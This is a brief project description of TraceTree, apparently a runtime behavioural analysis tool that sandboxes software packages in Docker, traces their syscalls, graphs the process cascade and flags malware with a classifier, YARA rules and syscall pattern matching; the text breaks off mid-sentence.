TraceTree
TraceTree - Runtime behavioral analysis tool that maps the process cas
TraceTree monitors what software actually does when it runs, not just what it claims to be. It sandboxes packages inside Docker, attaches strace to capture every syscall, and builds a directed graph of the full process cascade: every file touched, every network call made, every child process spawned. That graph gets fed into a RandomForest classifier trained on real malware samples, plus YARA rules and n-gram syscall pattern matching, to flag behavioral signatures that static scanners and...